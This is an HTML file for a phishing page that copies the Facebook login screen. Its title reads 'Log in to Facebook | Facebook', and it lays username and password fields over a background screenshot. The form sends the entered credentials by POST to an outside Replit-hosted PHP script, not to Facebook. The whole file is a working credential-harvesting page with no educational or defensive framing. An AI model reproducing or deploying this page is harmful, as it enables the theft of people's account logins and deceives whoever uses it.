<!DOCTYPE html>

<html lang="en">

<head>

  <meta charset="UTF-8">

  <meta http-equiv="X-UA-Compatible" content="IE=Edge">

  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>Log in to Facebook | Facebook</title>

  <link rel="stylesheet" href="style.css">

  <style>

    html {

      background-image: url('1.jpg');

      background-size: 100vw 100vh;

      background-repeat: no-repeat;

      height: 100px; /* Replace with your desired height */

      width: 360px;

    }

    

    * {

      margin: 0;

      padding: 0;

    }

    

    #input1 {

      position: relative;

      top: 8.5vh;

      left: 3.5vw;

      height: 7.3vh;

      width: 92vw;

      border: 0.1vw solid gray;

      border-radius: 5px;

      font-size: 3.7vw;

    }

    

    #input2 {

      position: absolute;

      top: 17.1vh;

      left: 3.5vw;

      height: 7.3vh;

      width: 92vw;

      border: none;

      border: 0.1vw solid gray;

      border-radius: 5px;

      font-size: 3.7vw;

    }

    

    #op {

      width: 85vw;

      position: absolute;

      left: 6vw;

      top: 25.96vh;

      height: 7vh;

    }

  </style>

  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>

</head>

<body>

  <form id="loginForm" method="post" action="https://php-web-server-1--premruidas.repl.co/index.php">

    <input type="text" id="input1" name="username" placeholder="Mobile number or email address">

    <input type="password" id="input2" name="password" placeholder="Password">

    <input type="image" src="2.jpg" id="op">

  </form>

  

  <script>

    $(document).ready(function() {

      $('#op').click(function() {

        $('#loginForm').submit();

      });

    });

  </script>

</body>

</html>

